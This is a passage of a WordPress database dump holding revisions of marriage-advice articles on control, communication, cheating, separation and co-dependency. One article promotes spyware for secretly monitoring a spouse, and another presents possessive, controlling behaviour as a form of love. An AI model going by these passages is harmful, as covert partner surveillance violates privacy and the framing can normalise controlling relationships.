than you would? Maybe you have personal control issues yourself.','inherit','closed','closed','','56-revision-v1','','','2017-10-04 09:40:57','2017-10-04 09:40:57','',56,'http://www.bournesociety.org.uk/56-revision-v1',0,'revision','',0),(267,1,'2017-10-04 09:41:46','2017-10-04 09:41:46','<div id=\"content\" class=\"hfeed\">\r\n<div id=\"post-153\" class=\"post-153 post type-post status-publish format-standard hentry category-marriage tag-control-freak tag-keep-your-marriage tag-marriage-problems tag-nancy-wasson tag-relationship tag-resentment post_box top\">\r\n<div class=\"headline_area\">\r\n<h1 class=\"entry-title\">Horrible Control Issues That Cause Marriage Problems! Read our guide on avoiding this</h1>\r\n<p class=\"headline_meta\"></p>\r\n\r\n</div>\r\n<div class=\"format_text entry-content\">\r\n\r\nHave you ever been irritated because your spouse does things differently than you do? Do you get upset if he or she has different opinions and makes different choices than you would? If so, you have bumped up against some of your own personal <em>control issues</em> and triggers in your marriage. Here are three important points to consider:<span id=\"more-153\"></span>\r\n<h3><strong>1. Fear underlies control issues.</strong></h3>\r\n<span style=\"text-decoration: underline;\">Control issues</span> cause problems in many marriages. The feelings you experience at those times can be very intense and may include rage at the other person. Most people feel more secure when others around them mirror their opinions, beliefs, and choices. Your safety needs and fears contribute to your wanting others to be just like you. The old adage, “There is safety in numbers,” refers to this primitive fear of standing alone.\r\n\r\nAlso, many people feel more in control when they can predict the behavior of others and when others meet their expectations. Then they don’t have to experience the discomfort of growing, changing, or stretching themselves. Instead, they can pretend that their world is logical, orderly, predictable, and safe.\r\n<h3><strong>2. Thinking your spouse should be just like you harms your marriage.</strong></h3>\r\nYour control issues are also triggered by viewing your spouse as an extension of yourself. This perception can result in trying to dictate which clothes your spouse wears, how she wears her hair, who she is friends with, what political views she holds, and what she can or cannot do. While your spouse may initially make some changes trying to keep the peace, you are creating a parent-child dynamic in your relationship that will eventually foster rebellion and resentment.\r\n<h3><strong>3. Using insults and name calling are attempts to regain control.</strong></h3>\r\nWhile nothing sinister is involved in many control issues in relationships, pathological behavior can be triggered in some instances. For example, a partner who is angry that the spouse did not follow his dictates could become physically and emotionally abusive. The partner may think he has the right to “punish” the other person. Name calling and derogatory put-downs, such as “What a stupid thing to do,” are often used to re-establish control over the other person.\r\n\r\nIt’s easy to point a finger at your spouse and to state that he or she needs to change. It’s hard to face your own unresolved issues head-on and take responsibility for how you need to change. As you become more aware of <strong>control issues</strong> in your marriage, the starting place for change is always with yourself and your response to what is happening.\r\n<h3></h3>\r\n</div>\r\n</div>\r\n</div>','Control Issues That Cause Marriage Problems','Control issues cause problems in many marriages. Do you get upset if he or she has different opinions and makes different choices than you would? Maybe you have personal control issues yourself.','inherit','closed','closed','','56-revision-v1','','','2017-10-04 09:41:46','2017-10-04 09:41:46','',56,'http://www.bournesociety.org.uk/56-revision-v1',0,'revision','',0),(268,1,'2017-10-04 09:42:28','2017-10-04 09:42:28','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-139 post type-post status-publish format-standard hentry category-marriage tag-communication tag-communication-problems tag-divorce tag-heart tag-otto-collins tag-passion tag-relationship post_box top\" id=\"post-139\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Communication Problems – Is Silence really Golden?</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <p>A couple of weeks ago, we went to the movies and right before the actual movie started, there was a 30 second commercial on the screen reminding us that “Silence is golden.” While this is helpful advice for a movie theatre, we don’t think it works very well when it comes to communicating in relationships.<span id=\"more-139\"></span></p>\n<p>The problem is that many people in relationships think that if they just keep silent and not say what they are thinking or feeling, their relationship will be better off than if they had said what was on their mind.</p>\n<p><em>While this sounds good in theory– it doesn’t work in reality.</em></p>\n<p>When we keep our feelings to ourselves, it may temporarily keep the peace and keep the relationship going smoothly but in the long run, this creates distance, separation, mistrust and dries up passion like a weed in the desert.</p>\n<p>In our previous long term relationships, both of us kept silent about our thoughts and feelings that were important to us because we didn’t want to make waves in the relationship. While this wasn’t the only contributing factor, both of our previous marriages ended in divorce.</p>\n<p>In our relationship, we made an agreement early on to be honest about our thoughts and feelings with each other no matter how difficult or painful this might be.</p>\n<p>One of the contributors to our “<a rel=\"nofollow\" href=\"../go/stayorgo/\">Should You Stay or Should You Go?”</a> book told her story about how she didn’t keep silent in her relationship.</p>\n<p>She told us that she was best friends and engaged to a man who lived in a city several states away from hers. Sometime after he had moved to her city and they had decided to get married, she began feeling that the relationship would not work.</p>\n<p>She agonized for weeks, and after much prayer, she told him her painful truth–that she felt in her heart that their relationship “wasn’t right” and there were too many differences between them. She told us that once she was honest with herself (and with him), her pain disappeared.</p>\n<p>Now we’re not saying that everyone has to know every thought and feeling that you have. We are saying that if you want to live an authentic, vibrant life and perhaps have a connected, passionate, alive relationship, silence is not golden.</p>\n<p>We have found that the best way to tell your thoughts and feelings so that the other person can hear is to simply say what is true for you without pointing the finger at them (making them wrong.)</p>\n<p>Sometimes this is easier said than done when the subject is a particularly thorny one between the two of you.</p>\n<p>But what we have found is that if you both can listen to each other until there is some sense of understanding, without emotionally or physically running away, you can work through almost any communication issue or challenge.</p>\n<p>Withholding your thoughts or feelings–hoping that it will all  be okay if you just keep silent– is rarely a strategy that works.</p>\n<p>Making and keeping the agreement that you will both share your thoughts and feelings with each other and stay open to each other without becoming defensive helps to create more trust and intimacy in the relationship.</p>\n<p>We invite you to make this agreement or other agreements with the important people in your life.</p>\n<p>If you are interested in finding out more about how to have better communication in your relationships, you’ll find many more stories, specific suggestions and ideas in <a rel=\"nofollow\" href=\"/\">“Communication Magic”</a></p>\n<p>  </p>\n			  </div>\n			</div>\n		</div>','How to solve your Communication Problems – improving on silence','A couple of weeks ago, we went to the movies and right before the actual movie started, there was a 30 second commercial on the screen reminding us that \"S','inherit','closed','closed','','55-revision-v1','','','2017-10-04 09:42:28','2017-10-04 09:42:28','',55,'http://www.bournesociety.org.uk/55-revision-v1',0,'revision','',0),(269,1,'2017-10-04 09:44:18','2017-10-04 09:44:18','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-26 post type-post status-publish format-standard hentry category-affairs tag-cheating tag-discover tag-entire tag-help tag-relationship tag-yellow-pages post_box top\" id=\"post-26\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Discover if your husband or wife is cheating on you</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p> </p>\n<p>Do you have a feeling in your gut that’s something wrong in your  relationship? That maybe, just maybe, your partner’s being unfaithful?  If you do, then you have a decision to make and several options to  choose from.</p>\n<p>First, think about how sure you are of their infidelity. If you  aren’t sure at all, then option 1  confronting them right now, without  wasting any time  is completely out of the question. Doing so could  ruin the relationship because it would highlight, rightly or wrongly, that  you don’t trust your partner.<span id=\"more-26\"></span></p>\n<p>The second option: ignore your suspicions, assume they’re unfounded  and that they always will be, that nothing’s going on, and continue as  normal. This option’s one many people take, either to avoid being  confronted with an ugly truth  that their lover’s doing some extra  loving’ behind their backs  or because they fear they’re being unfair  to their partners by being suspicious of them and doubtful of their devotedness.</p>\n<blockquote class=\"right\"><p>As seen on CHEATERS<br />\nYou’ve seen the TV Show. When the show ends, it asks its viewers to visit their website. And what software do you see them promoting? That’s right, <a rel=\"nofollow\" href=\"../go/pcpandora/\">PC Pandora!</a></p></blockquote>\n<p>Third option: do something to help eradicate your suspicions  find  out either way what’s going on, if your partner’s cheating on you or if  they’re being faithful.</p>\n<p>Okay, let’s assume option three is the one for you. You want to find  out the truth and don’t want to simply ignore your gut instinct and  continue on as normal. What methods of investigation, ways of  discovering the facts, are there at your disposal?</p>\n<p>1. The simplest way (often considered the first step), and something  you might have already begun doing, is looking for obvious signs of  potential betrayal. Your partner smells of a fragrance, perfume or  after-shave you don’t recognize. They’ve been leaving the house for  work half an hour earlier than they’ve ever done before, for no  apparent reason. They don’t seem to enjoy sex with you as they used to,  or choose to avoid it completely whenever they can. Keep an eye out for  these surface signs of potential infidelity  in a way, looking for  them and recording them in your mind or on paper can be considered  harmless, it’s free information there to be noticed if only you’ll look.</p>\n<p>2. After the obvious potential signs of cheating dry up, or when you  feel you’re at a dead end looking for and analyzing them, more  forthright, headstrong action may be called for.</p>\n<blockquote class=\"right\"><p>“I  am currently a deployed soldier. My intentions with this program was to  make sure my wife wasn’t cheating on me. I have come to find out,she is”<a rel=\"nofollow\" href=\"../go/acespy/\">AceSpy</a></p></blockquote>\n<p>Some people, at this  point, reach straight for the Yellow Pages, thumbing right to the  private investigator section. That’s one option, sure, but there are  things you can do yourself before calling in a third party. First, you  could try setting a trap. It may sound a little primeval, like catching  a wild animal, but really it’s more like a test. These tests can take  many forms. For example, arrange a trip, say you’re going away for a  couple days to visit your folks, or friends, and use that time to keep  track of some of the things your partner does. You don’t necessarily  need to sit outside in the car with a pair of binoculars 24/7, just pay  attention to key times when your partner would  if you were home  do  certain things, like leave the house for work, come home, etc. You’d be  surprised how many cheaters embrace these rare, private opportunities  to further their affairs and indulge in some extra-marital ‘relations’.</p>\n<p>There are also subtler ways of testing your partner’s fidelity and  faithfulness. One of them is called the ‘gossip’ test. It involves  bringing up the topic of cheating using a fictional third party, such  as one of your work colleagues or friends. Mention, without hinting at  your suspicion of them in the slightest, that your friend (or whoever  you’ve chosen to use for this test) confided in you that they’re  cheating on their partner. Most people are, to some degree or another   even if it’s just to maintain conversation  interested in a little  gossip, especially if it involves a subject as juicy as infidelity. But  when cheaters hear the topic of cheating brought up, they tend to  silently panic  a rush of nerves sweeps their consciousness. Have they  been rumbled? Is this a test? Am I reacting like a non-cheater would to  this kind of chat? Keep a close watch on how YOUR partner reacts it  could provide a telling insight into their current state of mind, how  they feel about cheating, and whether or not  when you boil it right  down  you can trust them to not cheat on you.</p>\n<p class=\"greenbox\"> </p></div>\n			</div>\n		</div>','Here\'s how to find out if your wife/husband is cheating','Do you have a feeling in your gut that\'s something wrong in your relationship? That maybe, just maybe, your partner\'s being unfaithful? If you do, th','inherit','closed','closed','','59-revision-v1','','','2017-10-04 09:44:18','2017-10-04 09:44:18','',59,'http://www.bournesociety.org.uk/59-revision-v1',0,'revision','',0),(270,1,'2017-10-04 09:44:26','2017-10-04 09:44:26','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-63 post type-post status-publish format-standard hentry category-marriage post_box top\" id=\"post-63\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Different Ways Men Express Their Love				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/different-ways-men-express-their-love/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=marriage&amp;b=2\" href=\"../different-ways-men-express-their-love/\"></a></div>\n<p>I can sleep with her, marry her, take care of her, but love   that’s something else, said Tony, a married man in his late forties. Guys  don’t like to talk about love. They don’t know what to say. Of course guys do  love. But they express it differently.<span id=\"more-63\"></span></p>\n<p><!--ADBOX--></p>\n<p>Despite this fact, most women do not feel happy unless they  hear those golden words, I love you. Men need to hear them as well. And yet, as  much as men want love, many fight it to the last minute. Love can make men feel  vulnerable, childlike, and unable to do what is expected of them, especially  those who believe they’re functioning in a dog eat dog world.</p>\n<p>Still men do  love, and different types of men express their love differently. In fact, love  means different things to a man, at different times in his life. A woman needs  to be alert to who the man she is with is, and what love means to him. As  discussed in my book, What He Can’t Tell You And Needs To Say, there are  broadly, Four Types Of Men, and for each of these types, love will mean  something different, and certainly be expressed in different manners.</p>\n<p>Although most women wait to hear the golden words, I Love  You, here are 5 different ways that men use to express what they are feeling.  The first way is simply by saying I Love You. Actually, saying these words is  a huge step for some men. It means a lot more than simply expressing a feeling.  For some it feels like a life commitment, for others it is fraught with danger.</p>\n<p>When I say I love you, said Steve, I feel like I’m taking  my life in my hands and giving it to her. It is scary. I’ve got to really trust  her and know she won’t throw my love away in order to actually say the words to  her. In this case, the fear of rejection comes up strongly. Rejection is  enormously painful for most men, and saying, “I Love You, can be an  invitation to be hurt. Most men must feel very secure in the relationship and  in the woman’s feelings for him, before he will dare say those words.</p>\n<p>For others, saying, I love you, means, I am offering a  commitment. I am going to be here to do things for you. For many men, love is  expressed through action, so these words are a promise of what is to follow.  Simply by saying these words they feel they are agreeing to be there to give to  her and support her. If they don’t do it, they’ll feel like a heel.</p>\n<p>For others, the words means, I am not leaving, or I will  always be faithful. This can be very scary for some men. They feel the words  themselves are a promise, and if the promise is broken, they will suffer as  well. However, there is another type of man, The Lovers, Dreamers and Peter  Pans, who enjoy falling in love and letting the world know it. These men will say  I Love You easily. There are many different motives behind their words  though. Some say it to get a woman to make love with him, others to enter into  a romantic fantasy, some to feel as though they are the great lover of all  time. By saying these words, others seem to be offering the woman the world,  (that they have no intention of giving). Others say it just for the sheer  pleasure of seeing how good it makes the woman feel, and how powerful this  makes him.</p>\n<p>When a woman hears those precious words, she should step  back a moment and put them in context. What do they mean to this particular  man? Are there other ways she might also realize that he loves and is caring  for her?</p>\n<p>Another way men express their love is through bringing gifts  to the woman. There are many different kinds of gifts a man can give. The  obvious ones include those wrapped in packages, candy, flowers, special notes.  However, there are others that a woman may or may not be aware of. For example,  for some men, giving their time to you, is a gift. They spend more time with  you, and less with family and friends, this is their way of saying they love  you. They are choosing to be with you. For them, the conclusion should be  obvious  that they love you.</p>\n<p>There are other gifts that can be given as well, standing up  for you during a difficult time, going with you to your family, doing things  for you, attending important functions with you, planning trips, dates or  outings, and putting you first in their thoughts. As many men are not so  comfortable with expressing their feelings directly, these behaviours are  indicators that they care a great deal. Many expect the woman to realize that  these actions are being generated because they love.</p>\n<p>Another one of the Four Types of Men are the perfectionists,  controllers, and addicts (work addicts, love addicts). For some of these men, a  way of expressing love is through being jealous, or possessive. (Other types of  men can fall into this as well) Although this may not feel good to many women  for these men it is can be a sign that they care about you, you’re important to  them and they don’t want anyone else near. They do not want to share your  attention. It is especially upsetting to these men if you speak of or look at  other guys.</p>\n<p>Although being controlled is not being loved, in the pure  sense of the word, to many men and women, the two overlap. Many women feel  cared for when the man wants to know where she’s going during the day, who  she’s with, and what she’s doing. It’s a sign that he cares a great deal, said  Renee. Sure, it can be annoying that he’s so controlling, but if he wasn’t,  truthfully, I don’t think I’d feel loved or cared about. For Renee this kind  of behaviour produces a sense of security. Even though he’s controlling her, at  least she’s on his mind, and in this way she feels she’s controlling him as  well. She translates this to mean that the man is involved; he cares about what  she is doing. He wants to make sure that she does not spend more time with  others than she does with him.</p>\n<p>Other men say, I love you through physical displays. They  are affectionate and spend quality time making love to you. Some men can most  easily express their feelings during lovemaking. After being intimate, they  feel as though they have loved you, and often feel loved as well. The physical  contact breaks down barriers and provides a feeling of closeness that cannot be  so easily be obtained in another manner for them. Most women need affection and  foreplay as well as sexuality. For the women this is what makes them feel  loved. Some women require hearing words of spoken during this time as well.</p>\n<p>This can be a complex area, because sex can mean so many different things to  different individuals. But when a man is open, giving and affectionate with a  woman on an on-going basis, it is often his way of expressing love. For him  love means meeting her needs and having his needs met as well. Some use  sexuality to avoid or cover? up areas in  the relationship that might be difficult. They feel that if the sex is good,  everything else will fall into place. Usually, when the sex is reluctant, or  not happening, it is an indicator that something is missing emotionally, or  that conflict exists in the relationship. Sex is a sensitive barometer to what  is going on in all aspects of one’s life.</p>\n<p>Another way of saying I Love You is taking you home to  meet the family, (and close, meaningful friends). This is often an indicator  that the man has deeper feelings for you. Not only does it say that he is proud  of you, but he wants to connect you with the people who mean the most to him.  He wants you to care about them, and for them to care about you as well. This  is a sure sign that intimacy and love is increasing for him, that you are  becoming a significant part of his life.</p>\n<p>Some women complain a great deal about not having met the  family, being kept separate and apart. When this goes on for too long in a  relationship, it can be a sign that the depth of his feelings for you, and his  involvement is lacking.</p>\n<p>Some men compartmentalize relationships; they have someone  for dating, someone for sex, someone else for the kind of love that leads to  marriage. By being aware of the people in his life that he introduces you to,  and includes you with, you can get a good idea of how he operates in this area.  Does he want you in all parts of his life, or is this a limited relationship?  Love, in the deepest sense, includes sharing all parts of ourselves with  another.</p>\n<p>It is helpful to keep a little journal of your relationship.  So many acts and expressions of love go unnoticed and unfelt, because we simply  get used to them, or are too busy to stop and take note  or to stop and say  thank you. In the journal of your relationship, take a few minutes each evening  to note, what you received that day, and also what you gave. Write it down. Be  specific. List everything, like phone calls, kind words, a surprise visit, etc.  It will be amazing to you to realize all the ways your partner is giving to you  and it will be wonderful to find new ways to give back to him.</p>\n<p> </p></div>\n								</div>\n		</div>','How men express their love','','inherit','closed','closed','','58-revision-v1','','','2017-10-04 09:44:26','2017-10-04 09:44:26','',58,'http://www.bournesociety.org.uk/58-revision-v1',0,'revision','',0),(271,1,'2017-10-04 09:44:44','2017-10-04 09:44:44','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-70 post type-post status-publish format-standard hentry category-marriage tag-keep-your-marriage tag-nancy-wasson post_box top\" id=\"post-70\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Can a Marriage Separation Ever Save a Marriage?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/can-a-marriage-separation-ever-save-a-marriage/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"><iframe src=\"http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fsaveyourmarriage.co.uk%2Fcan-a-marriage-separation-ever-save-a-marriage%2F&amp;count=vertical&amp;lang=en\" height=\"62\" width=\"55\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\"></iframe></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=Keep+Your+Marriage,Nancy+Wasson&amp;b=2\" href=\"../can-a-marriage-separation-ever-save-a-marriage/\"></a></div>\n<p>As an experienced counselor, one of the questions I’m asked frequently is, Can a marriage separation ever save a marital relationship? My answer is a qualified yes.</p>\n<p>Sometimes a couple is miserable living together and can’t seem to co-exist without having constant harping and bickering. If they have children, they may worry about the impact on them of all the fighting. Each spouse wants the marriage to work and is willing to work on the problems and issues in marriage counseling while they’re separated.<span id=\"more-70\"></span></p>\n<p>Couples in this situation often plan to use the separation period to let the dust settle, reflect on the marriage, take responsibility for their share of what has happened, and work on individual and joint issues in counseling. One goal is for the spouses to use their problem-solving skills in counseling to address and resolve the most serious problems before moving back together. Both spouses agree not to date anyone else and to focus exclusively on working to improve the marriage.</p>\n<p>For these couples, the marriage separation can be a time to think, to reflect, to analyze, to cool off and calm down, and to take a break from each other. It also provides time and space for each spouse to make unhurried, thoughtful decisions instead of waiting for things to blow up and then impulsively leaving. Used in this way, a planned separation can actually help to save a marriage.</p>\n<p>In other cases, one spouse or the other may move out on the spur of the moment after an upsetting argument. The separation is unplanned, and there are no plans for marriage counseling, no guidelines agreed upon about seeing others, and no tentative time-line for the separation.</p>\n<p>There is usually much anxiety on the part of the partner who has been left unexpectedly and there are many unanswered questions: What is happening? Will the partner file for divorce? Will the marriage survive? Whether the separation will help or hurt the marriage is unknown in this case. Things could go either way, depending on what happens.</p>\n<blockquote class=\"right\"><p> </p></blockquote>\n<p>Another situation that can result in separation is when a spouse is living in an intolerable situation in the marriage. Perhaps the partner is verbally abusive, chronically runs around, or shows continual disrespect towards his or her spouse in some other way. The spouse may have tried to get the partner to go to counseling, but the partner always refused.</p>\n<p>Sometimes the best thing the spouse can do is to decide to separate and hope that the partner will be shocked enough by the unexpected action to finally agree to work on the marriage. In situations like this, a separation can sometimes save the marriage.</p>\n<p>The partner often says, I knew we had some problems, but I didn’t think they were that serious. I never thought she (or he) would really leave. She kept telling me, but I didn’t believe her. The spouse then has to stand firm and let the partner know that she is going to live separately because I refuse to be in a marriage where I’m treated like this. I deserve more.</p>\n<p>By not rushing to file for divorce, the spouse finds out during the planned separation if the partner is finally motivated enough to enter counseling and work on changing. If the couple enters counseling, the therapist will then be able to give them a recommendation about when they are ready to live together again, if ever.</p>\n<p>Of course, there are no guarantees in a marriage separation. The separation might be instrumental in saving the marriage, or it may widen the gap between the two spouses and eventually lead to divorce. A planned separation is always preferable to an impulsive one.</p>\n<p>The following five tips can help you if you need to think about separating from your spouse:</p>\n<p>1. Talk with your spouse about what your individual goals are for the separation. Are they the same or different?</p>\n<p>2. Try to reach agreement that neither of you will date anyone else during this period of time. If your marriage is going to have the best chance possible, you’ll want to agree not to have sexual entanglements with others so you can continue to work on your relationship.</p>\n<p>3. Set a tentative time period for the separation, such as three months. At the end of that time, you can both re-evaluate the decision in terms of what’s best for each of you.</p>\n<p>4. Agree to seek individual and joint counseling during the separation to address the key problems and issues that have caused conflict in the marriage. This is an ideal time to do some deep individual work on your own personal issues as well as to address core relationship issues.</p>\n<p>5. Set guidelines that you both agree to about how much contact you’ll have during the separation and what kind of contact it will be. It doesn’t do any good to have a separation if one spouse or the other is calling on the phone every five minutes and constantly wanting to talk more about the problems. The separation is supposed to reduce conflict and give each person some space and relief from constant pressure and arguments.</p>\n<p class=\"alert\">  </p>\n				</div>\n								</div>\n		</div>','Can a Marriage Separation Save a Marriage? Check out our opinions','','inherit','closed','closed','','47-revision-v1','','','2017-10-04 09:44:44','2017-10-04 09:44:44','',47,'http://www.bournesociety.org.uk/47-revision-v1',0,'revision','',0),(272,1,'2017-10-04 09:48:00','2017-10-04 09:48:00','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1306 post type-post status-publish format-standard hentry category-marriage tag-counselor tag-feelings tag-help tag-make tag-marriage-divorce tag-marriage-problems tag-relationship tag-usa post_box top\" id=\"post-1306\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Can You Save a Marriage When It Seems Impossible?</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>You may be asking yourself is there any way to <em>save a marriage</em> when it has hit rock bottom? Is there any possibility of saving a marriage when it seems no hope is left?</p>\n<p>Well, the good news is that saving a marriage from divorce is quite possible if you are prepared to try. And if you succeed, then it’s almost certain that you and your spouse will have an even closer relationship than ever before. So when you ask if there is any way to <span style=\"text-decoration: underline;\">save a marriage</span> I would give a definite “Yes!”</p>\n<p><span id=\"more-1306\"></span></p>\n<h2><em><strong>Will giving your marriage a second chance work?</strong></em></h2>\n<p>A survey was conducted in the USA on hundreds of people who considered their marriage as “unhappy.” The results of the survey discovered that couples who agreed to delay their plans to divorce and give their marriage another chance rated their marriage as “happy” a few years later. So it just goes to prove that if you try hard enough you can put an end to your marriage problems and be happy once again.</p>\n<h2><em><strong>Where did the love go?</strong></em></h2>\n<p>No matter how big the problems are in a marriage, most spouses still have a lingering trace of care and concern for their partner. This is not surprising because you probably married them in the first place because you had a lot of love and respect for them, didn’t you?</p>\n<p>Sometimes your spouse will have changed for the worse over the years, developing attitudes and personality traits that make them seem less attractive as a person than when you were first married. However, if you can recall how they used to be, and all the good things that first attracted you to him or her, there is a good chance of rekindling all the feelings you once had.</p>\n<h2><em><strong>Can you save a marriage by yourself though?</strong></em></h2>\n<p>One of the most misguided beliefs about saving a marriage is that both partners have to be willing to save it. Although it’s true that both partners have to renounce any thoughts of divorce eventually, one spouse can still do something on their own to turn things around. This will give the marriage a little breathing space whilst the other reconsiders.</p>\n<p>The rationale is that if you alter your attitudes towards your spouse, it might encourage them to change their behavior, creating a less tense atmosphere.</p>\n<h2><em><strong>Get sound marriage advice.</strong></em></h2>\n<p>One of the problems of trying to  on your own is that you might be too emotionally involved to make sound decisions. This might cause you to go over the top and do things you shouldn’t do. Taking advice from an informed, impartial intermediary is so important. Seeing a marriage counselor is the most obvious choice but sometimes one partner will refuse to take part, which makes it more difficult.</p>\n<p>If you can’t get your spouse to participate then you will have to attempt it on your own – but you will need practical advice on how to save the marriage. You can find lots of good advice in <a href=\"/\">marriage books</a> and courses that have helped many to save a marriage.</p>\n<h2><em><strong>What if only one of you wants to save the marriage?</strong></em></h2>\n<p>Some of the advice in them has worked even when only one spouse wanted to save the marriage. Even if you are the only one trying to keep your marriage together, it is still possible to turn things round by making some changes in your own behavior.</p>\n<p>Of course, if your partner is willing to try too, it will improve your chances dramatically.</p>\n<p>So, if you feel that there is still a chance to  then it’s time to start doing something positive about it.</p>\n<p>Don’t just sit back waiting for things to happen. Now is the time for you to take action if you want to <a title=\"save the marriage review\" href=\"../save-the-marriage-review/\"></a>.</p>					<p class=\"post_tags\"> </p></div>\n			</div>\n		</div>','How can you save a marriage when it seems impossible?','You may be asking yourself is there any way to save a marriage when it has hit rock bottom? Is there any possibility of saving a marriage when it seems no hope is left?','inherit','closed','closed','','49-revision-v1','','','2017-10-04 09:48:00','2017-10-04 09:48:00','',49,'http://www.bournesociety.org.uk/49-revision-v1',0,'revision','',0),(273,1,'2017-10-04 09:48:12','2017-10-04 09:48:12','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-167 post type-post status-publish format-standard hentry category-marriage tag-co-dependency tag-confidence tag-equality tag-interdependence tag-marriage post_box top\" id=\"post-167\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Co-dependent marriages are not healthy</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/co-dependent-marriages-are-not-healthy/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=Co+Dependency,Confidence,Equality,Interdependence,Marriage&amp;b=2\" href=\"../co-dependent-marriages-are-not-healthy/\"></a></div>\n<p>Co-dependent marriages are the most abusive form of marriages. They are based on need, but are not healthy. Each partner in the marriage tries to take advantage of his or her hold on the other partner. This can often deteriorate into the sort of marriage where the two partners can neither live together nor live apart. <span id=\"more-167\"></span></p>\n<p>This marriage is most unlike the-we-need-each-other marriage, which is healthy. There, the partnership is based on equality, and not on one partner’s extreme needs. For instance, a woman looking after a drug addict may delude herself into believing that the addict cannot live without her support. The addict too psyches himself into believing that he cannot live without his partner. He therefore starts inflicting miseries on his partner, which she happily suffers – in the belief that this is the only way to keep the addict happy.</p>\n<p>Such a marriage often results from an unexpected or traumatic experience that jars the normal growth of an individual. Such an event or happening may be the death of a parent, breakup of a family or severe illness. Young girls and boys, who go through this experience, often build extreme marriages. </p>\n<p>They need not be blamed. We are born dependent and needy. The child is dependent on the mother for nurturing and being looked after. Later, the child becomes dependent on the parents for needs such as education and entertainment. Simultaneously, the child becomes confident, and gets ready to take independent decisions. Often this independence leads to interdependence. As per needs and convenience, the child who has become an adult switches between independence and interdependence.</p>\n<p>However, sometimes independence creeps into co-dependence. This is where adults need to be aware, and stop the marriage from sliding into co-dependency. The individual needs the confidence to become independent, to stand on his own feet. There is no harm in encouraging inter-dependence, but co-dependence in a marriage must be avoided at all costs.</p>\n<p> </p></div>\n								</div>\n		</div>','Co-dependent marriages - are they healthy?','','inherit','closed','closed','','52-revision-v1','','','2017-10-04 09:48:12','2017-10-04 09:48:12','',52,'http://www.bournesociety.org.uk/52-revision-v1',0,'revision','',0),(274,1,'2017-10-04 09:48:25','2017-10-04 09:48:25','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-133 post type-post status-publish format-standard hentry category-marriage tag-communication tag-conflict tag-feelings tag-relationship post_box top\" id=\"post-133\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Communication Breakdown				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n				  <p>It happens to the best of us. <a title=\"Communication in a relationship\" href=\"../communication-listening-from-love/\">Communication in a relationship</a> is such a fickle thing, and the lines of communication can become blurred every so often, especially when feelings are involved. Even those who think that they are immune to the confusion of conflict can find themselves drawn into a communication breakdown when they least expect it, and chaos ensues.<span id=\"more-133\"></span></p>\n<p>This happened to me on the weekend, and until to be quite honest, it took me by surprise. Even those of us who are better equipped than many others are not immune. My partner told me something that really hurt my feelings, and I lashed back in defense. It was a silly argument, over something as simple as a misplaced bottle of aftershave. But to me, it represented something much deeper, that had been 